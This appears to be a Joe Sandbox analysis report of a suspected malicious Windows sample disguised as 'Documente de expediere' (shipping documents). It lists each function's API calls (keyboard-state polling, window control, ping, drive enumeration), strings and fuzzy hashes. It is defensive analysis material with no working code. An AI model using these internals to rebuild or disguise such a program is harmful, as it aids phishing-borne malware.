                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 208665112-3771769585
                                                • Opcode ID: d9f4206015bb3662e7bf7eea34f80f203bb7a2c794847daad96477e5172f3246
                                                • Instruction ID: 84f9b9565ef38b8349c611e9e0e80f107d62eab85158879a0509ce1b5fbaec46
                                                • Opcode Fuzzy Hash: d9f4206015bb3662e7bf7eea34f80f203bb7a2c794847daad96477e5172f3246
                                                • Instruction Fuzzy Hash: E111D571A08119AFCB20EB289C06EEB77AD9F01720F048179F60596191EFB49AC18765
                                                APIs
                                                • timeGetTime.WINMM ref: 006F521C
                                                  • Part of subcall function 006B0719: timeGetTime.WINMM(?,75A4B400,006A0FF9), ref: 006B071D
                                                • Sleep.KERNEL32(0000000A), ref: 006F5248
                                                • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 006F526C
                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006F528E
                                                • SetActiveWindow.USER32 ref: 006F52AD
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006F52BB
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 006F52DA
                                                • Sleep.KERNEL32(000000FA), ref: 006F52E5
                                                • IsWindow.USER32 ref: 006F52F1
                                                • EndDialog.USER32(00000000), ref: 006F5302
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                • String ID: BUTTON
                                                • API String ID: 1194449130-3405671355
                                                • Opcode ID: a5adf3b2afa178f1961c55e227899d31b7a651ff9a654fc4e50bd993d47d75a6
                                                • Instruction ID: 1816aa94389e7c4427a59fd576a64fd8c83fd400524f5ffe87079aa017a29c7b
                                                • Opcode Fuzzy Hash: a5adf3b2afa178f1961c55e227899d31b7a651ff9a654fc4e50bd993d47d75a6
                                                • Instruction Fuzzy Hash: 53219571204708AFE7015B28FC89AF53B6BFB44347F00D528F302812B1EBA95D50D669
                                                APIs
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • CoInitialize.OLE32(00000000), ref: 006FD855
                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006FD8E8
                                                • SHGetDesktopFolder.SHELL32(?), ref: 006FD8FC
                                                • CoCreateInstance.OLE32(00722D7C,00000000,00000001,0074A89C,?), ref: 006FD948
                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006FD9B7
                                                • CoTaskMemFree.OLE32(?,?), ref: 006FDA0F
                                                • _memset.LIBCMT ref: 006FDA4C
                                                • SHBrowseForFolderW.SHELL32(?), ref: 006FDA88
                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006FDAAB
                                                • CoTaskMemFree.OLE32(00000000), ref: 006FDAB2
                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006FDAE9
                                                • CoUninitialize.OLE32(00000001,00000000), ref: 006FDAEB
                                                Similarity
                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                • String ID:
                                                • API String ID: 1246142700-0
                                                • Opcode ID: d9e2e22c62a893d023f1de0a7ad668eda266db138c7fd0e0c08f89974bf190fc
                                                • Instruction ID: aae7ad7e9b27e8ca490bfec04a8fcf29c389083385b7e63a06a92079c3839de4
                                                • Opcode Fuzzy Hash: d9e2e22c62a893d023f1de0a7ad668eda266db138c7fd0e0c08f89974bf190fc
                                                • Instruction Fuzzy Hash: 92B10F75A00109AFDB44DFA9C885DAEBBFAFF48314B0484A9F909EB251DB30ED41CB54
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 006F05A7
                                                • SetKeyboardState.USER32(?), ref: 006F0612
                                                • GetAsyncKeyState.USER32(000000A0), ref: 006F0632
                                                • GetKeyState.USER32(000000A0), ref: 006F0649
                                                • GetAsyncKeyState.USER32(000000A1), ref: 006F0678
                                                • GetKeyState.USER32(000000A1), ref: 006F0689
                                                • GetAsyncKeyState.USER32(00000011), ref: 006F06B5
                                                • GetKeyState.USER32(00000011), ref: 006F06C3
                                                • GetAsyncKeyState.USER32(00000012), ref: 006F06EC
                                                • GetKeyState.USER32(00000012), ref: 006F06FA
                                                • GetAsyncKeyState.USER32(0000005B), ref: 006F0723
                                                • GetKeyState.USER32(0000005B), ref: 006F0731
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: a3c03796e2caf18652dab14e2ecf41ddf03409109f92bbd6b349df1a00585df3
                                                • Instruction ID: aba8f35879f6ccf38d3ec61b5b49f6ec17f2e463133f5359056c2a2f9e7a2b0f
                                                • Opcode Fuzzy Hash: a3c03796e2caf18652dab14e2ecf41ddf03409109f92bbd6b349df1a00585df3
                                                • Instruction Fuzzy Hash: E851FD60A0478C59FF34DBA085547FABFB69F02380F08859DD7C25A2C3DAA49A4CCF55
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 006EC746
                                                • GetWindowRect.USER32(00000000,?), ref: 006EC758
                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 006EC7B6
                                                • GetDlgItem.USER32(?,00000002), ref: 006EC7C1
                                                • GetWindowRect.USER32(00000000,?), ref: 006EC7D3
                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 006EC827
                                                • GetDlgItem.USER32(?,000003E9), ref: 006EC835
                                                • GetWindowRect.USER32(00000000,?), ref: 006EC846
                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 006EC889
                                                • GetDlgItem.USER32(?,000003EA), ref: 006EC897
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006EC8B4
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 006EC8C1
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                • Opcode ID: fc018c03024da631007c06adea59d6b031a73864599245e404b87bdd24644443
                                                • Instruction ID: 70e99869d0ca81e6e7b7b9749fc50e3a146e063d0d57339542e7d9fff4980683
                                                • Opcode Fuzzy Hash: fc018c03024da631007c06adea59d6b031a73864599245e404b87bdd24644443
                                                • Instruction Fuzzy Hash: F7513B71B00205AFDB18CFADDD99AAEBBBAEB88310F14C12DF516D62E0D7709D008B14
                                                APIs
                                                  • Part of subcall function 00691B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00692036,?,00000000,?,?,?,?,006916CB,00000000,?), ref: 00691B9A
                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006920D3
                                                • KillTimer.USER32(-00000001,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 0069216E
                                                • DestroyAcceleratorTable.USER32(00000000), ref: 006CBEF6
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 006CBF27
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 006CBF3E
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 006CBF5A
                                                • DeleteObject.GDI32(00000000), ref: 006CBF6C
                                                Similarity
                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 641708696-0
                                                • Opcode ID: 273186414bffd3e6e7a7de6d2cfa545587551d860df5c25f8ac12df3cf6bb9b0
                                                • Instruction ID: 4531bcfa4f56d0b42e935a221a96fc2bb0f60a73a9661ddb789f13bde54bc11b
                                                • Opcode Fuzzy Hash: 273186414bffd3e6e7a7de6d2cfa545587551d860df5c25f8ac12df3cf6bb9b0
                                                • Instruction Fuzzy Hash: CF617730100712EFCB259F18DD59BAAB7F6FB44312F50852CE55287AA0C7B9A891DF98
                                                APIs
                                                  • Part of subcall function 006925DB: GetWindowLongW.USER32(?,000000EB), ref: 006925EC
                                                • GetSysColor.USER32(0000000F), ref: 006921D3
                                                Similarity
                                                • API ID: ColorLongWindow
                                                • String ID:
                                                • API String ID: 259745315-0
                                                • Opcode ID: 00befb0916ee10b367ec8b92c6e9e90317273c51f77086aaaec705de626dcf23
                                                • Instruction ID: 6c043703a3069a47baf9b96505c2e7e4412e4962853cdb3685493b34b2a6d917
                                                • Opcode Fuzzy Hash: 00befb0916ee10b367ec8b92c6e9e90317273c51f77086aaaec705de626dcf23
                                                • Instruction Fuzzy Hash: 4B41D231004105BBDF255F28EC98BF93B6BEB06331F288265FD658A6E2C7358D42DB21
                                                APIs
                                                • CharLowerBuffW.USER32(?,?,0071F910), ref: 006FAB76
                                                • GetDriveTypeW.KERNEL32(00000061,0074A620,00000061), ref: 006FAC40
                                                • _wcscpy.LIBCMT ref: 006FAC6A
                                                Strings
                                                Similarity
                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 2820617543-1000479233
                                                • Opcode ID: c4d9606ecb18a896b356023a72c4e6f2f68f8895ab4ee303a90abcb8c44e4c60
                                                • Instruction ID: 072e0815c277c80b97cae04453001083e4e350f95b7595fff329acff165a6fae
                                                • Opcode Fuzzy Hash: c4d9606ecb18a896b356023a72c4e6f2f68f8895ab4ee303a90abcb8c44e4c60
                                                • Instruction Fuzzy Hash: 0651CFB01583059BC750EF58C881ABFB7ABEF80300F14882DF59A576A2DB319D4ACB57
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                  • Part of subcall function 00692344: GetCursorPos.USER32(?), ref: 00692357
                                                  • Part of subcall function 00692344: ScreenToClient.USER32(007567B0,?), ref: 00692374
                                                  • Part of subcall function 00692344: GetAsyncKeyState.USER32(00000001), ref: 00692399
                                                  • Part of subcall function 00692344: GetAsyncKeyState.USER32(00000002), ref: 006923A7
                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0071C2E4
                                                • ImageList_EndDrag.COMCTL32 ref: 0071C2EA
                                                • ReleaseCapture.USER32 ref: 0071C2F0
                                                • SetWindowTextW.USER32(?,00000000), ref: 0071C39A
                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0071C3AD
                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0071C48F
                                                Strings
                                                Similarity
                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$pru$pru
                                                • API String ID: 1924731296-3743244019
                                                • Opcode ID: 4b6932bc2392d0bd4941c5b4be4d4bf9efb788547abd8c274b7e56cb03295eb2
                                                • Instruction ID: 662cbb15ecc84bee89b5a0ce34108f9f4ceee9f972ffee6ddbe556510fb4ff84
                                                • Opcode Fuzzy Hash: 4b6932bc2392d0bd4941c5b4be4d4bf9efb788547abd8c274b7e56cb03295eb2
                                                • Instruction Fuzzy Hash: 7651A370208344AFDB04DF18CC56FAA7BE5FB88311F04852DF9558B2E1DB79A984CB56
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: __i64tow__itow__swprintf
                                                • String ID: %.15g$0x%p$False$True
                                                • API String ID: 421087845-2263619337
                                                • Opcode ID: a7d7562260f195f5ba513ade2132648381c167fae0f888f503363d62882016f2
                                                • Instruction ID: 098825c509f9a18f1991bac7bffe227c5873113059527347eb13eda0c27f118f
                                                • Opcode Fuzzy Hash: a7d7562260f195f5ba513ade2132648381c167fae0f888f503363d62882016f2
                                                • Instruction Fuzzy Hash: 4A41E4B1604205AFEF24AF7CD842FBA77EFEB04300F24446EE549D7291EA719942CB21
                                                APIs
                                                • _memset.LIBCMT ref: 007173D9
                                                • CreateMenu.USER32 ref: 007173F4
                                                • SetMenu.USER32(?,00000000), ref: 00717403
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00717490
                                                • IsMenu.USER32(?), ref: 007174A6
                                                • CreatePopupMenu.USER32 ref: 007174B0
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007174DD
                                                • DrawMenuBar.USER32 ref: 007174E5
                                                Strings
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                • String ID: 0$F
                                                • API String ID: 176399719-3044882817
                                                • Opcode ID: b0dfcb79e077460b672bc9503e3d6e343bba0139e08e2787470ac4154cc04800
                                                • Instruction ID: 448b7e932611ade45d4922e36dda1b5f7e0c512ccbb746056d471ef9a5493cf9
                                                • Opcode Fuzzy Hash: b0dfcb79e077460b672bc9503e3d6e343bba0139e08e2787470ac4154cc04800
                                                • Instruction Fuzzy Hash: 86415874A00245EFDB14DF68D884EDABBFAFF49310F148029ED55973A0D739A960CB94
                                                APIs
                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007177CD
                                                • CreateCompatibleDC.GDI32(00000000), ref: 007177D4
                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007177E7
                                                • SelectObject.GDI32(00000000,00000000), ref: 007177EF
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 007177FA
                                                • DeleteDC.GDI32(00000000), ref: 00717803
                                                • GetWindowLongW.USER32(?,000000EC), ref: 0071780D
                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00717821
                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0071782D
                                                Strings
                                                Similarity
                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                • String ID: static
                                                • API String ID: 2559357485-2160076837
                                                • Opcode ID: 2323d8a338cb204d327e89ce75df15406ad0d1e1e6cc757f9c193e8de5ea12b2
                                                • Instruction ID: 9790a317536074295ec4a0ac15aa8979892c1087fc8d425f9c622ba230fe4535
                                                • Opcode Fuzzy Hash: 2323d8a338cb204d327e89ce75df15406ad0d1e1e6cc757f9c193e8de5ea12b2
                                                • Instruction Fuzzy Hash: F8316C31105219BBDF159FA8DC09FDA3B79EF09721F118224FA15A61E0C739D861DBA8
                                                APIs
                                                • _memset.LIBCMT ref: 006B707B
                                                  • Part of subcall function 006B8D68: __getptd_noexit.LIBCMT ref: 006B8D68
                                                • __gmtime64_s.LIBCMT ref: 006B7114
                                                • __gmtime64_s.LIBCMT ref: 006B714A
                                                • __gmtime64_s.LIBCMT ref: 006B7167
                                                • __allrem.LIBCMT ref: 006B71BD
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B71D9
                                                • __allrem.LIBCMT ref: 006B71F0
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B720E
                                                • __allrem.LIBCMT ref: 006B7225
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B7243
                                                • __invoke_watson.LIBCMT ref: 006B72B4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                • String ID:
                                                • API String ID: 384356119-0
                                                • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                • Instruction ID: 3fb368e48253ce19883de08d2e633aa0aa079eda2af269bc1c731919869c0ec2
                                                • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                • Instruction Fuzzy Hash: 4D71B8F1A04716ABD714AE79CC41BEAB3BAEF94324F14422EF514E7381E770DA808794
                                                APIs
                                                • _memset.LIBCMT ref: 006F2A31
                                                • GetMenuItemInfoW.USER32(00756890,000000FF,00000000,00000030), ref: 006F2A92
                                                • SetMenuItemInfoW.USER32(00756890,00000004,00000000,00000030), ref: 006F2AC8
                                                • Sleep.KERNEL32(000001F4), ref: 006F2ADA
                                                • GetMenuItemCount.USER32(?), ref: 006F2B1E
                                                • GetMenuItemID.USER32(?,00000000), ref: 006F2B3A
                                                • GetMenuItemID.USER32(?,-00000001), ref: 006F2B64
                                                • GetMenuItemID.USER32(?,?), ref: 006F2BA9
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006F2BEF
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006F2C03
                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006F2C24
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                • String ID:
                                                • API String ID: 4176008265-0
                                                • Opcode ID: 1c70e53bdca3c9193144dd2234207e2fdb84f8286256dce70d52792e72ba496e
                                                • Instruction ID: 4ff6fe0d0f0cf69fce10c3093fb83c3a88d5e6a237f35e03a482186255b2b79f
                                                • Opcode Fuzzy Hash: 1c70e53bdca3c9193144dd2234207e2fdb84f8286256dce70d52792e72ba496e
                                                • Instruction Fuzzy Hash: 8261AFB090024EAFDB21CF64C8A8DFE7BBAFB01308F144459EA41A7291D735AD55DF21
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00717214
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00717217
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0071723B
                                                • _memset.LIBCMT ref: 0071724C
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0071725E
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007172D6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow_memset
                                                • String ID:
                                                • API String ID: 830647256-0
                                                • Opcode ID: b113f049a9bd1eb9930011f4b9292499f71f012f69057fc1b04d170c8781190b
                                                • Instruction ID: 91c5a1011f8aa6406ba57fffc2e1eb217a5ffc07055ba04c4295493043a24021
                                                • Opcode Fuzzy Hash: b113f049a9bd1eb9930011f4b9292499f71f012f69057fc1b04d170c8781190b
                                                • Instruction Fuzzy Hash: C0618A71A00248AFDB10DFA8CC81EEE77F9EB09710F104159FA14A72E1C778AE85DB60
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006E7135
                                                • SafeArrayAllocData.OLEAUT32(?), ref: 006E718E
                                                • VariantInit.OLEAUT32(?), ref: 006E71A0
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 006E71C0
                                                • VariantCopy.OLEAUT32(?,?), ref: 006E7213
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 006E7227
                                                • VariantClear.OLEAUT32(?), ref: 006E723C
                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 006E7249
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006E7252
                                                • VariantClear.OLEAUT32(?), ref: 006E7264
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006E726F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: 462767fa1dbecab26f7837f4bbb592aa0522a7da17bc852369c7914be33e96db
                                                • Instruction ID: c944421db154992343b5175bafedee21b987ed7d6b524ee0f5a9f1a90ae2bfb8
                                                • Opcode Fuzzy Hash: 462767fa1dbecab26f7837f4bbb592aa0522a7da17bc852369c7914be33e96db
                                                • Instruction Fuzzy Hash: 4A415135904259AFCF00DFA9DC449EEBBB9FF08354F00C069F915A7261DB34AA45CB94
                                                APIs
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • CoInitialize.OLE32 ref: 00708718
                                                • CoUninitialize.OLE32 ref: 00708723
                                                • CoCreateInstance.OLE32(?,00000000,00000017,00722BEC,?), ref: 00708783
                                                • IIDFromString.OLE32(?,?), ref: 007087F6
                                                • VariantInit.OLEAUT32(?), ref: 00708890
                                                • VariantClear.OLEAUT32(?), ref: 007088F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 834269672-1287834457
                                                • Opcode ID: cddd4b53318ff4abfb3da0026e28caa89b11601a3b0a48c13734b5b8441088f6
                                                • Instruction ID: 72d7dcebd113f22007c55816c835aa2a8984a3fd622ee46d2722c1f2cd1171e0
                                                • Opcode Fuzzy Hash: cddd4b53318ff4abfb3da0026e28caa89b11601a3b0a48c13734b5b8441088f6
                                                • Instruction Fuzzy Hash: 9B616970608701EFD750DF64C888B6ABBE8AF48714F148A1DF9859B2D1CB78E944CB97
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 00705AA6
                                                • inet_addr.WSOCK32(?,?,?), ref: 00705AEB
                                                • gethostbyname.WSOCK32(?), ref: 00705AF7
                                                • IcmpCreateFile.IPHLPAPI ref: 00705B05
                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00705B75
                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00705B8B
                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00705C00
                                                • WSACleanup.WSOCK32 ref: 00705C06
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                • String ID: Ping
                                                • API String ID: 1028309954-2246546115
                                                • Opcode ID: a4f6010f7481b3cdc2cc1421a6a2dc0d143cb314116f2ef3a91a4c3680efcd81
                                                • Instruction ID: 68a8f9c823e0156e4d008ae36f838717ea2cde1ab48618633c8d56d1551264cd
                                                • Opcode Fuzzy Hash: a4f6010f7481b3cdc2cc1421a6a2dc0d143cb314116f2ef3a91a4c3680efcd81
                                                • Instruction Fuzzy Hash: F2516B71604700EFDB119F28CC45B6ABBE5EB44710F148A29F956DB2E1DB78E8008F59
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 006FB73B
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006FB7B1
                                                • GetLastError.KERNEL32 ref: 006FB7BB
                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 006FB828
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
